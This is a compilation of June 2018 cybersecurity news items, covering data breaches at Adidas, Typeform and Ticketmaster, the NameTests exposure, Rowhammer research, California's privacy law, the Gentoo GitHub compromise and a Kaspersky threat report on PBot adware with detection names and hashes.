“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,”
The company introduced measures to audit existing accounts and control the creation of New ones.
Twitter
Twitter is incresing checks on the sign-up process to make idifficult to register spam accounts, for example requesting more iteration ti the user such as the confermatuon of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection, its engineers are working to introduce measures that one detected suspicions activities by challenging the owner of the account in actions that request its interaction.


Adidas warns US consumers of a potential security breach
30.6.2018 securityaffairs Incindent

The sportswear company Adidas announced that it has launched an investigation after learning of a potential security breach that could impact millions of its US customers.
Adidas published a security alert to warn that hackers may have stolen customer data from its US website.

The German sportswear company confirmed that attackers may have had unauthorized access to customer personal data, including addresses, email addresses, and encrypted passwords.

The company highlighted that neither financial nor fitness information was exposed.

“On June 26, adidas became aware that an unauthorized party claims to have acquired limited data associated with certain consumers.” states the data breach notification published by Adidas.

“According to the preliminary investigation, the limited data includes contact information, usernames and encrypted passwords, Adidas has no reason to believe that any credit card or fitness information of those consumers was impacted.”

adidas data breach

The company became aware of the security breach on 26 June and notified the data breach to law enforcement.

The firm is notifying the incident to the affected customers that could be targeted by spear-phishing campaigns in the incoming weeks.

US customers urge to change the password and to remain vigilant about potential attacks.


Facebook Quiz app NameTests left 120 Million users’ data exposed online
30.6.2018 securityaffairs
Social

Experts discovered a third-party quiz app, called NameTests, that was found exposing data of up to 120 million Facebook users.
A bug on the Nametests.com exposed data of over 120 million users who took personality quizzes on Facebook, the good news is that the flaw was addressed as part of the Facebook’s Data Abuse Bounty Program launched in April.

nametests

The issue resided in Nametests.com that shares users’ data with any third-party that requested it.

The flaw was reported by the researchers Inti De Ceukelaire, who explained that when loading a personality test, the website displays personal information loaded from http://nametests.com/appconfig_user.

The data loaded from Nametests.com was wrapped in JavaScript, this means that it could be shared with other websites.

“In a normal situation, other websites would not be able to access this information. Web browsers have mechanisms in place to prevent that from happening.” the researcher wrote in a blog post.

“Since NameTests displayed their user’s personal data in JavaScript file, virtually any website could access it when they would request it,”

The experts set up a website that fetched data about the visitor from the Nametests.com website. In turn, ametests.com provided the access token that could also be used to gain access to the visitor’s posts, photos and friends, depending on the permissions granted.

“NameTests would also provide a secret key called an access token, which, depending on the permissions granted, could be used to gain access to a visitor’s posts, photos and friends. It would only take one visit to our website to gain access to someone’s personal information for up to two months.” De Ceukelaire added.

Below the video PoC published by the expert that shows how NameTests was revealing visitor’s identity even after deleting the app.

nametests

In order to prevent such behavior, the user would have had to manually delete the cookies on their device.

The expert also discovered that the user information would continue to be available through the website even after they deleted the application. Users would have had to manually delete the cookies on their devices to prevent their data from being leaked.

The issue was reported to Facebook’s Data Abuse program on April 22 and the company and a fix was rolled out on June 25.

According to Facebook, the bug could “have affected Facebook information people shared with nametests.com”, in response to the incident the tech giant revoked the access tokens for everyone on Facebook who has signed up to use this app

“It was reported by Inti De Ceukelaire and we worked with the app’s developer — Social Sweethearts — to address the website vulnerability he identified which could have affected Facebook information people shared with nametests.com.” reads a post published by Facebook.

” To be on the safe side, we revoked the access tokens for everyone on Facebook who has signed up to use this app. So people will need to re-authorize the app in order to continue using it.”
Facebook awarded the expert with $8,000 instead $4,000 bounty because he chose to donate it to charity.

“I also got a response from NameTests. The public relations team claims that, according to the data and knowledge they have, they found no evidence of abuse by a third party. They also state that they have implemented additional tests to find such bugs and avoid them in the future,” the researcher concluded.


The popular online survey software Typeform suffered a security breach
30.6.2018 securityaffairs Incindent

Typeform, the popular online survey platform, has suffered a data breach that exposed partial data of some users, no payment card data was stolen.

Typeform, the popular online survey platform, is the last victim of a data breach. Typeform software is widely adopted by businesses worldwide to easily arrange surveys, it allows easy creation of interfaces to collect user data.

The company has confirmed the security breach that exposed partial data of some users.

“On June 27, 2018, our engineering team became aware that an unknown third party gained access to our server and downloaded certain information. As a result of this breach, some data was compromised. ” reads the data breach notification published by the company.

According to Typeform, no payment card data or password information for the website had been exposed in the security breach.

The Spanish firm discovered the intrusion on June 27th, and immediately launched an internal investigation.

The experts discovered that attackers accessed company servers and downloaded a partial data backups for surveys conducted before May 3rd, 2018.

The company identified the vulnerability exploited by the hackers and patched it a few hours then it notified the incident to the affected users.

At the time there is no information about the flaw exploited by the hackers, the company highlighted that even if customers collected payments via Typeform’s Stripe integration, the payment details they have corrected are safe.

Typeform

One of Typeform’s customers, the digital mobile bank Monzo, confirmed confirmed that personal data of about 20,000 people are likely to have been exposed due to the security breach.

“Our initial investigations suggest that some personal data of about 20,000 people is likely to have been included in the breach.” reads the security advisory published by Monzo.

“For the vast majority of people, this was just their email address. For a much smaller proportion of others, this may have included other data like their Twitter username or postcode. We’ve published a full breakdown at the bottom of this post,”

Unfortunately, the number of data breaches continue to increase and a growing number of personal details are flooding the black marketplaces.

Yesterday the sportswear company Adidas announced potential data breach that affected millions of its U.S. customers while the global entertainment ticketing service Ticketmaster suffered the same problem.


Researchers Devise Rowhammer Attacks Against Latest Android Versions
29.6.2018 securityweek  Android  Attack 

A team of researchers from universities worldwide have devised a new set of DMA-based Rowhammer attacks against the latest Android OS, along with a lightweight defense to prevent such attacks on ARM-based devices.

Rowhammer is a vulnerability impacting dynamic random-access memory (DRAM) chips that can be abused to gain kernel privileges on Linux systems. Discovered in 2012 but documented only in 2014, the bug can also be exploited remotely using JavaScript or via graphics processing units (GPUs).

Last year, researchers from Graz University of Technology, the University of Pennsylvania (and University of Maryland), and University of Adelaide revealed a series of attack methods able to bypass existing defenses against Rowhammer.

Now, eight researchers from Vrije Universiteit Amsterdam, Amrita University India, UC Santa Barbara, and EURECOM propose RAMpage, a set of attacks that target the latest Android versions with a root exploit and app-to-app exploits that bypass all defenses.

In a research paper (PDF), they also propose GuardION, lightweight defenses that mitigate Rowhammer exploitation on ARM systems by isolating DMA buffers with DRAM-level guard rows.

Furthermore, the researchers claim that re-enabling higher order allocations, which Google disabled to prevent attacks, would improve system performance.

Rowhammer is a hardware bug that “consists of the leakage of charge between adjacent memory cells on a densely packed DRAM chip.” This means that, when a row of bits in the DRAM module is used, the neighboring rows are slightly affected, and attackers can abuse this to completely subvert a system’s security.

The issue is particularly serious on mobile devices, where hardware upgrades are not possible, the security researchers argue. They also note that existing software defenses are not effective and present attacks can circumvent all currently proposed and implemented defense techniques.

To exploit Rawhammer, an attacker needs to land a security-sensitive page into a vulnerable physical memory location and also needs to access the DRAM chip fast enough to hit the same rows before they are refreshed. They also have to determine the virtual addresses that map to the two physical rows adjacent to the victim row.

To mitigate the risks, Google disabled the contiguous heap, but left the system heap available. The company also reduced internal system heap pools to two and enforced that the system heap only returns memory pages from highmem.

By exhausting the system heap, the researchers were able to get contiguous pages and find exploitable bit flips via double-sided Rowhammer. The researchers then tricked the system into releasing pre-allocated cached memory, including the row with the vulnerable page, and developed a root exploit leveraging this attack technique.

The researchers also say it is possible to corrupt buffers belonging to another app or process, an attack scenario that could abuse privileged apps for increased damage. They also argue that an attacker could try to exhaust the Contiguous Memory Allocator (CMA) bit map, or to corrupt system memory from CMA-allocated memory. Such attacks, however, are technically challenging, the experts admit.

GuardION, the newly proposed mitigation against DMA-based Rowhammer exploits on mobile devices, focuses on limiting the capabilities of an attacker’s uncached allocations. Expensive fine-grained isolation can be applied for each DMA allocation, and GuardION isolates buffers with two guard rows: one at the ‘top’ and another at the ‘bottom’.

“This enforces a strict containment policy in which bit flips that are triggered by reading from uncached memory cannot occur outside the boundaries of that DMA buffer. In effect, this design defends against Rowhammer by eradicating the ability of the attacker to inject bit flips in sensitive data,” the researchers claim.

The mitigation, however, is based on the premises that bit flips don’t occur in memory pages physically located more than one row away from the aggressor rows. Such flips have never been reported before and the Rowhammer attack itself makes such incidents unlikely to ever occur.

According to the research paper, not only is GuardION’s performance impact negligible, but its integration with the current Android code base is rather easy. A prototype implementation contains only 844 lines of code and touches only 9 files in the Android source code. The researchers are in the process of submitting the patch to Google for adoption.


California, Home of Silicon Valley, Ramps Up Online Privacy Law
29.6.2018 securityweek  Privacy

California on Thursday passed a strict new law aimed at protecting people's privacy online, a move that promised to shift the terrain on which internet firms operate in the wake of recent scandals.

The bill, signed into law by Governor Jerry Brown, followed in the spirit of the General Data Protection Regulation, which recently took effect in Europe.

The legislation cut off an initiative that is heading for the ballot in this state in the fall.

It was crafted to ensure rights including knowing what personal information is collected by companies on the internet and whether it is sold, and to whom, according to the bill signed by Brown.

The law also gives people a right to "say no" to the sale of their personal information, and calls for them to be treated the same as anyone else online if they opt to restrict use of their data.

Internet businesses that receive "verifiable" requests by people to have their data deleted will be required to do so, with a list of exceptions that include keeping what is needed to complete transactions, detect security breaches, or protect against illegal activity.

"A consumer shall have the right, at any time, to direct a business that sells personal information about the consumer to third parties not to sell the consumer's personal information," the legislation said.

"This right may be referred to as the right to opt out."

Business home pages will be required to provide "clear and conspicuous" links titled "Do Not Sell My Personal Information" that take people to opt-out pages.

People whose personal information is stored unencrypted and not sufficiently protected were also give the right to pursue civil claims.

The shift both in Europe and California came after the harvesting of Facebook users' data by Cambridge Analytica, a US-British political research firm, for the 2016 US presidential election.

- Potential to spread -

Nonprofit advocacy group Consumer Watchdog called the California legislation "landmark reform" and branded it the toughest state privacy law in the US.

"Silicon Valley companies will very likely implement many of these reforms across their entire customer base, not just for Californians," said Consumer Watchdog president Jamie Court.

"California has led the way and Californians must be ever vigilant in the next year that the legislature does not undermine these protections at the behest of tech lobbyists and moguls."

The Internet Association, an industry lobbying group, expressed concerns about the law, saying there was a lack of public input as it was hurried through the legislative process.

"Data regulation policy is complex and impacts every sector of the economy, including the internet industry," association vice president of state government affairs Robert Callahan said in a statement posted on its website.

"That makes the lack of public discussion and process surrounding this far-reaching bill even more concerning."

Callahan contended that California policymakers will need to "correct the inevitable, negative policy and compliance ramifications this last-minute deal will create for California's consumers and businesses alike."

The list of Internet Association members includes titans such as Amazon, Facebook, Google, Microsoft, Netflix and Twitter.

During a meeting Thursday with reporters at Facebook's headquarters in Silicon Valley, chief operating officer Sheryl Sandberg said the leading social network supported the California legislation.


Former Equifax Manager Charged With Insider Trading
29.6.2018 securityweek  IT

US securities regulators announced insider trading charges on Thursday against a former Equifax manager who sold shares in the company before it disclosed a giant data breach.

Sudhakar Reddy Bonthu, a product development manager at Equifax, allegedly netted more than $75,000 after placing orders on September 1, 2017 betting that Equifax shares would fall, according to a complaint by the US Securities and Exchange Commission.

Six days later, the company announced one of the biggest data breaches ever, sending shares sharply lower.

"As we allege, Bonthu, who was entrusted with confidential information by his employer, misused that information to conclude that his company had suffered a massive data breach and then sought to illegally profit," said Richard Best, director of the SEC's Atlanta Regional Office.

"Corporate insiders simply cannot abuse their access to sensitive information and illegally enrich themselves."

Bonthu, 44, a resident of Georgia, settled the SEC civil charges and agreed to return his ill-gotten gains plus interest, the agency said.

Bonthu has also been charged in a parallel US criminal case by the Department of Justice, the SEC said.

Bonthu is the second Equifax defendant in an insider trading case after authorities in March brought criminal and civil charges against former Equifax executive Jun Ying.

Key personal data, including names, social security numbers and dates of birth, were pilfered from more than 140 million Americans in the Equifax hack.

On Wednesday, the company agreed to new oversight requirements under a consent order with eight state regulators, including financial regulatory bodies in New York, Georgia and California.


Google Expands Android's Compiler-Based Mitigations
29.6.2018 securityweek  Android

Google this week announced expanded compiler-based mitigations in Android P, in an attempt to make bugs harder to exploit and prevent specific types of issues from becoming vulnerabilities.

One of these is Control Flow Integrity (CFI), which represents a set of mitigations meant to “confine a program's control flow to a call graph of valid targets determined at compile-time.” Android already supports CFI implementation in select components, but the next platform release will expand that support, the search giant says.

“This implementation focuses on preventing control flow manipulation via indirect branches, such as function pointers and virtual functions,” Google explains.

The idea is to use valid branch targets to reduce the set of allowable destinations an attacker can call, while indirect branches are used to detect runtime violations of the statically determined set of allowable targets, in which case the process aborts.

By restricting control flow to a small set of legitimate targets, Google attempts to make code-reuse attacks much harder to execute, while also making memory corruption vulnerabilities more difficult or even impossible to exploit.

CFI requires compiling with Link-Time Optimization (LTO), which also results in reduced binary size and improved performance, although compile time increases. According to Google, testing has revealed “negligible overhead to code size and performance.”

In Android P, CFI will be enabled by default widely within the media frameworks and other security-critical components, including NFC and Bluetooth.

Android P also expands the number of libraries that will benefit from Integer Overflow Sanitization, which was meant to safely abort process execution when an overflow is detected. Thus, an entire class of memory corruption and information disclosure vulnerabilities are mitigated.

Google has expanded the use of these sanitizers in the media framework with each release and also improved them to reduce performance impact.

“In testing, these improvements reduced the sanitizers' performance overhead by over 75% in Android's 32-bit libstagefright library for some codecs. Improved Android build system support, such as better diagnostics support, more sensible crashes, and globally sanitized integer overflow targets for testing have also expedited the rollout of these sanitizers,” the Internet company says.

Google decided to bring integer overflow sanitization to libraries where complex untrusted input is processed or security bulletin-level integer overflow flaws were reported. Thus, in Android P, the libui, libnl, libmediaplayerservice, libexif, libdrmclearkeyplugin, and libreverbwrapper libraries will benefit from these sanitizers.

“Moving forward, we're expanding our use of these mitigation technologies and we strongly encourage vendors to do the same with their customizations,” Google notes.


Twitter shared details about its strategy for fighting spam and bots
29.6.2018 securityaffairs 
Social 

Twitter provided some details on new security processes aimed at preventing malicious automation and spam.
The tech giant also shared data on the success obtained with the introduction of the new security measures.
Social media platform are a privileged tool for psyops and malicious campaign, for this reason, Twitter rolled out new features to detect and prevent any abuse.

Threat actors make a large use of bots to spread propaganda and malicious links, and social media platforms are spending significant efforts in threats mitigation.

Twitter claims it challenged in May more than 9.9 million potentially automated accounts used for malicious activity every week. The data shows a significant decrease from 6.4 million in December 2017.
The social media platform said that the security measures allowed to drastically reduce spam reports received from users, from 25,000 daily reports in March to 17,000 in May.
The company is removing 214% more spam accounts compared to 2017. Twitter suspended over 142,000 apps in the first quarter of 2018, most of them were shut down within a week or even within hours after being registered.

Twitter introduced measures to evaluate account metrics in near-real time.

The platform is able to recognize bots activity detecting synchronized operations conducted by multiple accounts.

Twitter announced it will remove follower and engagement counts from accounts flagged as suspicious that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“So, if we put an account into a read-only state (where the account can’t engage with others or Tweet) because our systems have detected it behaving suspiciously, we now remove it from follower figures and engagement counts until it passes a challenge, like confirming a phone number.” reads the blog post published by Twitter.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,”
The company introduced measures to audit existing accounts and control the creation of New ones.
Twitter
Twitter is incresing checks on the sign-up process to make idifficult to register spam accounts, for example requesting more iteration ti the user such as the confermatuon of an email address.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” continues the post. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

The company is investing in behavioral detection, its engineers are working to introduce measures that one detected suspicions activities by challenging the owner of the account in actions that request its interaction.


Facebook, Google 'Manipulate' Users to Share Data Despite EU Law: Study
29.6.2018 securityweek  Privacy

Facebook and Google are pushing users to share private information by offering "invasive" and limited default options despite new EU data protection laws aimed at giving users more control and choice, a government study said Wednesday.

The Norwegian Consumer Council found that the US tech giants' privacy updates clash with the new General Data Protection Regulation (GDPR), which forces companies to clarify what choices people have when sharing private information.

"These companies manipulate us into sharing information about ourselves," the council's director of digital services, Finn Myrstad, said in a statement.

"(This) is at odds with the expectations of consumers and the intention of the new Regulation," the 2018 study, entitled "Deceived By Design", concluded.

Myrstad said the practices showed "a lack of respect for their users, and are circumventing the notion of giving consumers control of their personal data".

The case for the new laws has been boosted by the recent scandal over the harvesting of Facebook users' data by British consultancy Cambridge Analytica for the 2016 US presidential election.

Information for the report was collected from mid-April to early June, a few weeks after the EU rules came into force.

- 'Very few actual choices' -

The report exposed that Facebook and Google often set the least privacy-friendly option as a default and that users rarely change pre-selected settings.

Privacy-friendly choices "require more clicks and are often hidden," it said.

"In many cases, the services obscure the fact that users have very few actual choices, and that comprehensive data sharing is accepted just by using the service," the study said.

But Facebook on Wednesday denied covering up the options for users and said they had prepared for 18 months to meet the GDPR requirements.

"We have made our policies clearer, our privacy settings easier to find and introduced better tools for people to access, download, and delete their information," the company's spokesman told Norwegian public broadcaster NRK.

The EU has billed the GDPR as the biggest shake-up of data privacy regulations since the birth of the web.

The social media giant and Google separately already face their first official complaints under the new law after an Austrian privacy campaigner accused them of forcing users to give their consent to the use of their personal information.

Companies can be fined up to 20 million euros ($24 million) or four percent of annual global turnover for breaching the strict new data rules for the European Union, a market of 500 million people.


Twitter Unveils New Processes for Fighting Spam, Bots
29.6.2018 securityweek 
Social

Twitter this week shared some details on new processes designed to prevent malicious automation and spam, along with data on the positive impact of the measures implemented in the past period.

Spam and bots are highly problematic on Twitter, but the social media giant says it has rolled out some new systems that have helped its fight against these issues. The company claims that last month it challenged more than 9.9 million potentially spammy or automated accounts every week, up from 6.4 million in December last year.

Twitter says it now removes 214% more spam accounts compared to 2017. It also claims that recent changes have led to a significant drop in spam reports received from users, from 25,000 daily reports in March to 17,000 in May.

The company also reported suspending over 142,000 apps in the first quarter of 2018, more than half of which were shut down within a week or even within hours after being registered.

One measure implemented recently by Twitter involves updating account metrics in near-real time. Spam accounts and bots often follow other accounts in bulk and this type of behavior should quickly be caught by Twitter’s systems. However, the company has now also decided to remove follower and engagement counts from suspicious accounts that have been put into a read-only state until they pass a challenge, such as confirming a phone number.

“We also display a warning on read-only accounts and prevent new accounts from following them to help prevent inadvertent exposure to potentially malicious content,” Twitter’s Yoel Roth and Del Harvey said in a blog post.

The company has also made some changes to its sign-up process to make it more difficult to register spam accounts. This includes requiring new accounts to confirm an email address or phone number.

Existing accounts are also being audited to ensure that they weren’t created using automation.

“As part of this audit, we’re imminently taking action to challenge a large number of suspected spam accounts that we caught as part of an investigation into misuse of an old part of the signup flow,” Roth and Harvey explained. “These accounts are primarily follow spammers, who in many cases appear to have automatically or bulk followed verified or other high-profile accounts suggested to new accounts during our signup flow.”

Finally, Twitter says it has expanded its malicious behavior detection systems with tests that can involve solving a reCAPTCHA or responding to a password reset request. Complex cases are passed on to Twitter employees for review.

Twitter also announced this week that users can configure a USB security key as part of the two-factor authentication (2FA) process.

On June 21, Twitter revealed that it entered an agreement to acquire Smyte, which specializes in safety, spam and security issues. By acquiring the company, the social media giant hopes to “improve the health of conversation on Twitter.”


Russia Expert to Lead Canada's Electronic Eavesdropping Agency
29.6.2018 securityweek  BigBrothers

A Russia expert was appointed Wednesday to lead Canada's electronic eavesdropping agency, amid ongoing concerns of Russian hacking and meddling in Western elections.

Shelly Bruce moves up from number two at the Communications Security Establishment (CSE) to replace her former boss, outgoing CSE head Greta Bossenmaier.

Bruce studied Russia and Slavic languages at university before joining the CSE in 2004 as director of intelligence, and quickly moved up the ranks.

Her appointment as the head of the CSE comes only two months after Ottawa moved to safeguard Canada's elections from cyber threats and "foreign interference," following accusations of Russia meddling in the last US election, which Russia has denied.

Canada's next federal election is scheduled for 2019.

Also in April, G7 foreign ministers called on Russia to come clean about a nerve agent attack on a former spy in Britain, calling it in a joint statement "a threat to us all."

Western nations had a month prior expelled 150 Russian diplomats in a coordinated action against Moscow in support of Britain, and Russia retaliated with similar moves.

They included four diplomats serving at either Russia's embassy in Ottawa or its consulate in Montreal who were "identified as intelligence officers or individuals who have used their diplomatic status to undermine Canada's security or interfere in our democracy," Foreign Minister Chrystia Freeland said then.

Canada is a member the US-led Five Eyes intelligence gathering alliance.

The CSE last year urged Ottawa to step up its hacking countermeasures, after identifying between 2013 and 2015 approximately 2,500 state-sponsored hacking attempts.


Ticketmaster Blames Third Party Over Data Breach
29.6.2018 securityweek  Incindent

Ticketmaster UK has had thousands of personal customer information compromised. This may include name, address, email address, telephone number, payment details and Ticketmaster login details, the company said.

How many accounts have been compromised has not been specified, although the company says in a statement, "Less than 5% of our global customer base has been affected by this incident;" adding, "Customers in North America have not been affected."

Details of the hack have not yet been disclosed other than it involved 'an unknown third-party'. The statement says that it identified malicious software on a support product hosted by Inbenta Technologies (part of Ticketmaster's supply chain). It did this on Saturday, June 23, and immediately 'disabled the Inbenta product across all Ticketmaster websites."

Ticketmaster clearly feels that Inbenta is at fault. Inbenta takes a slightly different view. In its own statement, CEO Jordi Torras, writes, "it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster's particular requirements." The attackers located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 2018.

But Torras adds, "Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability." In other words, it is Ticketmaster that is at fault.

James Romer, chief security architect at SecureAuth + Core Security, explains, "a customer service chatbot was compromised by malware and exported UK customers' data to an unknown third-party." In fact, the breach could extend to other nations. While Ticketmaster says, "we understand that only certain UK customers" are affected, it also says it is notifying all Ticketmaster International customers (outside of the U.S.) that they need to reset their passwords.

Ticketmaster has further concerns to consider. According to Monzo -- an online-only bank based in East London -- it warned Ticketmaster about a potential breach in early April. Monzo had detected fraudulent card activity that seemed to point to a Ticketmaster common factor. In a blog posted Thursday by Natasha Vernier, Monzo's head of financial crime, she explains that the bank reached out to Ticketmaster, and on 12 April, "members of the Ticketmaster security team visited the Monzo office so we could share the information we'd gathered. They told us they'd investigate internally."

Within a week, Monzo was sufficiently concerned and certain that it shared its information with the U.S. Secret Service, and started to proactively replace every Monzo customer card that had been used at Ticketmaster (about 6000).

One week after its security team visited Monzo's offices, Ticketmaster informed Monzo that it had found no evidence of a breach and that no other banks were reporting similar patterns. The breach wasn't actually found until some ten weeks after Monzo first raised its concerns.

"There are going to be a few eyebrows raised this morning about this breach and when Ticketmaster really discovered it," comments Tony Pepper, CEO and co-founder at Egress. Clearly data was at risk for some time, and apparently Ticketmaster had been alerted to the issue but didn't heed those warnings. It is going to be interesting to see how the ICO reacts when they get to the bottom of this, given the emphasis now placed on data breach reporting and reflected in the changes made under the GDPR."

This was a supply chain attack that took a long time to detect even when the company was told it had been breached. Supply chain attacks are increasing. "It's not uncommon for companies to be breached via a third-party supplier, which is why it's important to carefully consider who to work with and what security protocols they have in place," comments Andrew Bushby, UK director at Fidelis Cybersecurity.

It's worth noting that that the UK government's new Minimum Cyber Security Standard for government departments actually specifies that the supply chain should be required to meet the UK's Cyber Essentials level 6.

Joseph Carson wonders whether artificial intelligence will become embroiled in the case. "Many companies are using chat bots to help automate their customer experiences, having been lured into fancy buzzwords like machine learning, artificial intelligence and virtual assistance," he notes. While the theft of personal details, financial information and passwords means these are now available on the darknet for cybercriminals to abuse, he wonders what else might have been stolen. "It will be interesting to learn," he suggests, "whether the cybercriminals also accessed the artificial intelligence information that could be used for a more targeted type of attack."

The danger to victims of this breach is primarily twofold: fraudulent use of the stolen payment details, and more calculated identity theft. "The fact that payment card information has been caught up in this breach is hugely concerning," comments Brooks Wallace, Head of EMEA for Trusted Knight. "In cases like this, details often end up for sale on the dark web, rather than in the hands of the original hackers themselves, and then end up being used for fraudulent transactions and in some cases identity theft.

"When used to make transactions, fraudsters often start by testing small transactions here to make sure it works and then ramp up to bigger purchases. Anyone who thinks they may have been caught up in this breach needs to keep a very careful eye on their bank accounts and potentially should contact their bank to change their cards." In reality, any customer of Ticketmaster, whether a victim of this breach or not, will need to be wary of the inevitable opportunistic phishing emails that follow any such breach.

One aspect of this breach will only become clear over time: how will the European data protection regulators react in relation to the General Data Protection Regulation. It's a moot point since the actual breach occurred prior to the activation of GDPR, although internal recognition and victim notification both occurred within GDPR. The UK's ICO will probably treat the case similar to the Dixons Carphone breach: "It is early in the investigation. We will look at when the incident happened and when it was discovered as part of our work and this will inform whether it is dealt with under the 1998 or 2018 Data Protection Acts."


Hackers Plant Malicious Code on Gentoo Linux GitHub Page
29.6.2018 securityweek 
Virus

Gentoo Linux GitHub account hacked

Developers of the Gentoo Linux distribution warned users on Thursday that one of the organization’s GitHub accounts was compromised and that malicious code had been planted by the attackers.

“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there. We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,” Gentoo said on its website.

According to Gentoo developer Francisco Blas Izquierdo Riera, the attacker replaced the portage and musl-dev trees with malicious ebuilds designed to remove all files from a system. However, the developer says the code doesn’t actually work as intended in its current form.

Ebuilds are bash scripts used by Gentoo Linux for its Portage software management system.

Gentoo pointed out that code hosted on its own infrastructure is not impacted and the Gentoo repository mirrors are hosted in a separate GitHub account that does not appear to be affected by the breach.

“Since the master Gentoo ebuild repository is hosted on our own infrastructure and since Github is only a mirror for it, you are fine as long as you are using rsync or webrsync from gentoo.org,” users have been told.

Gentoo users have been advised not to utilize any ebuilds obtained from the compromised GitHub account prior to 18:00 GMT on June 28, 2018. GitHub has suspended the hacked account.

“All Gentoo commits are signed, and you should verify the integrity of the signatures when using git,” Gentoo said.


Possible Data Breach at Adidas Could Impact Millions of U.S. Customers
29.6.2018 securityweek  Incindent

German sportswear company Adidas on Thursday revealed that it launched an investigation after learning of a potential data breach that could impact millions of its U.S. customers.

In a notice posted on its website, Adidas said an unauthorized party claimed to have gained access to customer information. The company learned of the possible breach on June 26 and called in cybersecurity experts and law enforcement to assist in the investigation.

The unauthorized party may have obtained usernames, password hashes and contact information – which the company describes as “limited data” – of individuals who made purchases on Adidas’ US website, adidas.com/US.

Adidas says there is no evidence that credit card or fitness information has been compromised.

Adidas told some media outlets that the incident could impact “a few million” customers, but its statement suggests that not all customers in the United States are affected.

“While adidas continues its thorough forensic review, adidas is alerting relevant consumers,” the company stated.


Pbot: evolving adware
29.6.2018 Kaspersky 
Virus

The adware PBot (PythonBot) got its name because its core modules are written in Python. It was more than a year ago that we detected the first member of this family. Since then, we have encountered several modifications of the program, one of which went beyond adware by installing and running a hidden miner on victim computers:

Miner code installed through PBot

Two other versions of PBot we detected were restricted to the goal of placing unwanted advertising on web pages visited by the victim. In both versions, the adware initially attempts to inject a malicious DLL into the browser. The first version uses it to run JS scripts to display ads on web pages, the second — to install ad extensions in the browser. The latter is the more interesting of the two: developers are constantly releasing new versions of this modification, each of which complicates the script obfuscation. Another distinctive feature of this Pbot variation is the presence of a module that updates scripts and downloads fresh browser extensions.

Throughout April, we registered more than 50,000 attempts to install PBot on computers of users of Kaspersky Lab products. The following month this number increased, indicating that this adware is on the rise. PBot’s target audience is mainly in Russia, Ukraine, and Kazakhstan.

Geography of infection attempts

Distribution methods
PBot is generally distributed through partner sites whose pages implement scripts to redirect users to sponsored links.
Here is the standard PBot propagation scheme:

The user visits the partner site.
When any point on the page is clicked, a new browser window pops up that opens an intermediate link.
The intermediate link redirects the user to the PBot download page, which is tasked with downloading and running the adware on the victim computer by hook or by crook. The following is a section of code from one such page:

Code of a page propagating PBot

An HTA file is downloaded. On startup this file downloads the PBot installer.

PBot propagation chain

Operating logic
PBot consists of several Python scripts executed in sequence. In the latest versions of the program, they are obfuscated using Pyminifier.

Obfuscated script code

In the new versions of PBot, modules are executed according to the following scheme:

PBot installation

The source file *.hta downloads an executable file, which is the NSIS installer of PBot, to %AppData%.
The installer drops a folder with the Python 3 interpreter, Python scripts, and a browser extension into %AppData%.
Using the subprocess library, the ml.py script adds two tasks to Windows Task Scheduler. The first is tasked with executing ml.py when the user signs into the system, while the second runs app.py daily at 5:00. In addition, the winreg library is used to write the app.py script to the autoloader.
The launchall.py script runs app.py, which handles the update of PBot scripts and the download of new browser extensions.
Next, launchall.py checks whether the following processes are active:
browser.exe
chrome.exe
opera.exe
If the processes are found, the DLL-generating script brplugin.py is started. The resulting DLL is injected into the launched browser and installs the ad extension.

Writing the DLL to the browser process memory and executing the library

The browser extension installed by PBot typically adds various banners to the page, and redirects the user to advertising sites.

PBot result: Pop-up window with an ad clip on www.kaspersky.com

Conclusion
In pursuit of profit, adware owners often resort to installing their products on the sly, and PBot developers are no exception. They release new versions (and update them on user computers), complicating their obfuscation to bypass protection systems.
Kaspersky Lab solutions detect PBot with the following verdicts:
AdWare.Win32.PBot
AdWare.NSIS.PBot
AdWare.HTML.PBot
AdWare.Python.PBot

IoCs:
3cd47c91d8d8ce44e50a1785455c8f7c
1aaedcf1f1ea274c7ca5f517145cb9b5
bb2fbb72ef683e648d5b2ceca0d08a93
23e7cd8ca8226fa17e72df2ce8c43586
ad03c82b952cc352b5e6d4b20075d7e1
0cb5a3d428c5db610a4565c17e3dc05e
3a6ad75eb3b8fe07c6aca8ae724a9416
184e16789caf0822cd4d63f9879a6c81


Hackers compromised Gentoo Linux GitHub Page and planted a malicious code
29.6.2018 securityaffairs
Virus

The development team of the Gentoo Linux distribution notifies users that hackers compromised one of the GitHub accounts and planted a malicious code.

Developers of the Gentoo Linux distribution announced that hackers compromised one of the GitHub accounts used by the organization and planted a malicious code.

“Today 28 June at approximately 20:20 UTC unknown individuals have gained control of the Github Gentoo organization, and modified the content of repositories as well as pages there.” Gentoo wrote on its website.

“We are still working to determine the exact extent and to regain control of the organization and its repositories. All Gentoo code hosted on GitHub should for the moment be considered compromised,”

The Gentoo developer Francisco Blas Izquierdo Riera confirmed that attackers took control over the Gentoo repository on Github and replaced the portage and musl-dev trees with malicious ebuilds intended to delete all files from a system. The malicious software could not work on GitHub and the development team has already removed it.

“I just want to notify that an attacker has taken control of the Gentoo organization in Github and has among other things replaced the portage and musl-dev trees with malicious versions of the ebuilds intended to try removing all of your files.” explained Francisco Blas Izquierdo Riera.

